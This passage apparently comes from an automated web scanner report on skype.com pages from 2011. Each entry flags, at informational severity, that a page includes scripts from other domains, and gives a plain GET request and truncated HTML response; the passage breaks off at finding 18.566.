...[SNIP]...

18.549. http://www.skype.com/intl/en-us/business/group-video/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/business/group-video/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/business/group-video/ HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:39:43 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 51753


<!DOCTYPE html>
<html lang="en-US" >
<head>

   
   <!-- Meta -->
   <meta charset="utf-8" />
   <title>Group video calling - host real-time video conferences on Skype</title>
   <meta name="des
...[SNIP]...
</script>


   <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>


   <script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
<!-- Page specific javascripts-->
   

           <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/clientlib-min.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/segmentation-publish.js"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

18.550. http://www.skype.com/intl/en-us/business/skype-connect  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/business/skype-connect

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/business/skype-connect HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:39:39 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 96433


<!DOCTYPE html>
<html lang="en-US" >
<head>

   
   <!-- Meta -->
   <meta charset="utf-8" />
   <title>Skype Connect... - Enhance your SIP-enabled PBX system with Skype</title>
   <meta name="d
...[SNIP]...
</script>


   <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>


   <script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
<!-- Page specific javascripts-->
   

           <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/clientlib-min.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/segmentation-publish.js"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

18.551. http://www.skype.com/intl/en-us/business/skype-connect/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/business/skype-connect/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/business/skype-connect/ HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:39:42 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 96433


<!DOCTYPE html>
<html lang="en-US" >
<head>

   
   <!-- Meta -->
   <meta charset="utf-8" />
   <title>Skype Connect... - Enhance your SIP-enabled PBX system with Skype</title>
   <meta name="d
...[SNIP]...
</script>


   <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>


   <script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
<!-- Page specific javascripts-->
   

           <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/clientlib-min.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/segmentation-publish.js"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

18.552. http://www.skype.com/intl/en-us/business/skype-manager  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/business/skype-manager

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/business/skype-manager HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:39:38 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 71016


<!DOCTYPE html>
<html lang="en-US" >
<head>

   
   <!-- Meta -->
   <meta charset="utf-8" />
   <title>Business Collaboration - Skype Manager - Skype for Business - Skype</title>
   <meta name=
...[SNIP]...
</script>


   <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>


   <script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
<!-- Page specific javascripts-->
   

           <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/clientlib-min.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/segmentation-publish.js"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

18.553. http://www.skype.com/intl/en-us/business/skype-manager/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/business/skype-manager/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/business/skype-manager/ HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:39:41 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 71016


<!DOCTYPE html>
<html lang="en-US" >
<head>

   
   <!-- Meta -->
   <meta charset="utf-8" />
   <title>Business Collaboration - Skype Manager - Skype for Business - Skype</title>
   <meta name=
...[SNIP]...
</script>


   <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>


   <script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
<!-- Page specific javascripts-->
   

           <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/clientlib-min.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/segmentation-publish.js"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

18.554. http://www.skype.com/intl/en-us/campaigns/gvc/11q1_combined.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/campaigns/gvc/11q1_combined.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/campaigns/gvc/11q1_combined.html HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:13 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 49423


<!DOCTYPE html>
<html lang="en-US" >
<head>

   
   <!-- Meta -->
   <meta charset="utf-8" />
   <title>Group video calling - free trial offer - Skype</title>
   <meta name="description" content
...[SNIP]...
</script>


   <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>


   <script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/clientlib-min.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/segmentation-publish.js"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

18.555. http://www.skype.com/intl/en-us/features  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/features

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/features HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:39:18 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 54548


<!DOCTYPE html>
<html lang="en-US" >
<head>

   
   <!-- Meta -->
   <meta charset="utf-8" />
   <title>Internet Calls - Skype Features - Skype</title>
   <meta name="description" content="Love
...[SNIP]...
</script>


   <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>


   <script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
<!-- Page specific javascripts-->
   

           <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/clientlib-min.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/segmentation-publish.js"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

18.556. http://www.skype.com/intl/en-us/features/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/features/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/features/ HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:39:38 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 54548


<!DOCTYPE html>
<html lang="en-US" >
<head>

   
   <!-- Meta -->
   <meta charset="utf-8" />
   <title>Internet Calls - Skype Features - Skype</title>
   <meta name="description" content="Love
...[SNIP]...
</script>


   <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>


   <script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
<!-- Page specific javascripts-->
   

           <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/clientlib-min.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/segmentation-publish.js"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

18.557. http://www.skype.com/intl/en-us/features/allfeatures/call-forwarding  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/features/allfeatures/call-forwarding

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/features/allfeatures/call-forwarding HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:39:26 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 66164


<!DOCTYPE html>
<html lang="en-US" >
<head>

   
   <!-- Meta -->
   <meta charset="utf-8" />
   <title>Call Forwarding - Skype Call Forwarding - Skype</title>
   <meta name="description" conten
...[SNIP]...
</script>


   <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>


   <script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
<!-- Page specific javascripts-->
   

           <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/clientlib-min.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/segmentation-publish.js"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

18.558. http://www.skype.com/intl/en-us/features/allfeatures/call-forwarding/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/features/allfeatures/call-forwarding/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/features/allfeatures/call-forwarding/ HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:39:35 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 66164


<!DOCTYPE html>
<html lang="en-US" >
<head>

   
   <!-- Meta -->
   <meta charset="utf-8" />
   <title>Call Forwarding - Skype Call Forwarding - Skype</title>
   <meta name="description" conten
...[SNIP]...
</script>


   <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>


   <script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
<!-- Page specific javascripts-->
   

           <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/clientlib-min.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/segmentation-publish.js"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

18.559. http://www.skype.com/intl/en-us/features/allfeatures/call-phones-and-mobiles  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/features/allfeatures/call-phones-and-mobiles

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/features/allfeatures/call-phones-and-mobiles HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:39:19 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 69724


<!DOCTYPE html>
<html lang="en-US" >
<head>

   
   <!-- Meta -->
   <meta charset="utf-8" />
   <title>Call Mobiles and Landlines - Cheap Calls - Skype</title>
   <meta name="description" conte
...[SNIP]...
</script>


   <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>


   <script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
<!-- Page specific javascripts-->
   

           <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/clientlib-min.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/segmentation-publish.js"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

18.560. http://www.skype.com/intl/en-us/features/allfeatures/call-phones-and-mobiles/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/features/allfeatures/call-phones-and-mobiles/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/features/allfeatures/call-phones-and-mobiles/ HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:39:29 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 69724


<!DOCTYPE html>
<html lang="en-US" >
<head>

   
   <!-- Meta -->
   <meta charset="utf-8" />
   <title>Call Mobiles and Landlines - Cheap Calls - Skype</title>
   <meta name="description" conte
...[SNIP]...
</script>


   <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>


   <script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
<!-- Page specific javascripts-->
   

           <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/clientlib-min.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/segmentation-publish.js"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

18.561. http://www.skype.com/intl/en-us/features/allfeatures/call-transfer  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/features/allfeatures/call-transfer

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/features/allfeatures/call-transfer HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:39:27 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 42730


<!DOCTYPE html>
<html lang="en-US" >
<head>

   
   <!-- Meta -->
   <meta charset="utf-8" />
   <title>Call Transfer - Skype Call Transfer - Skype</title>
   <meta name="description" content="C
...[SNIP]...
</script>


   <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>


   <script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
<!-- Page specific javascripts-->
   

           <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/clientlib-min.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/segmentation-publish.js"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

18.562. http://www.skype.com/intl/en-us/features/allfeatures/call-transfer/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/features/allfeatures/call-transfer/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/features/allfeatures/call-transfer/ HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:39:36 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 42730


<!DOCTYPE html>
<html lang="en-US" >
<head>

   
   <!-- Meta -->
   <meta charset="utf-8" />
   <title>Call Transfer - Skype Call Transfer - Skype</title>
   <meta name="description" content="C
...[SNIP]...
</script>


   <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>


   <script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
<!-- Page specific javascripts-->
   

           <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/clientlib-min.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/segmentation-publish.js"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

18.563. http://www.skype.com/intl/en-us/features/allfeatures/caller-identification  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/features/allfeatures/caller-identification

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/features/allfeatures/caller-identification HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:39:27 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 44089


<!DOCTYPE html>
<html lang="en-US" >
<head>

   
   <!-- Meta -->
   <meta charset="utf-8" />
   <title>Caller ID - Skype Caller Identification - Skype</title>
   <meta name="description" conten
...[SNIP]...
</script>


   <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>


   <script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
<!-- Page specific javascripts-->
   

           <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/clientlib-min.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/segmentation-publish.js"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

18.564. http://www.skype.com/intl/en-us/features/allfeatures/caller-identification/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/features/allfeatures/caller-identification/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/features/allfeatures/caller-identification/ HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:39:36 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 44089


<!DOCTYPE html>
<html lang="en-US" >
<head>

   
   <!-- Meta -->
   <meta charset="utf-8" />
   <title>Caller ID - Skype Caller Identification - Skype</title>
   <meta name="description" conten
...[SNIP]...
</script>


   <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>


   <script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
<!-- Page specific javascripts-->
   

           <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/clientlib-min.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/segmentation-publish.js"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

18.565. http://www.skype.com/intl/en-us/features/allfeatures/conference-calls  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/features/allfeatures/conference-calls

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/features/allfeatures/conference-calls HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:39:20 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 44389


<!DOCTYPE html>
<html lang="en-US" >
<head>

   
   <!-- Meta -->
   <meta charset="utf-8" />
   <title>Conference Calls - Video Conferencing - Skype</title>
   <meta name="description" content=
...[SNIP]...
</script>


   <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>


   <script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
<!-- Page specific javascripts-->
   

           <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/clientlib-min.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/segmentation-publish.js"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

18.566. http://www.skype.com/intl/en-us/features/allfeatures/conference-calls/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/features/allfeatures/conference-calls/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/features/allfeatures/conference-calls/ HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

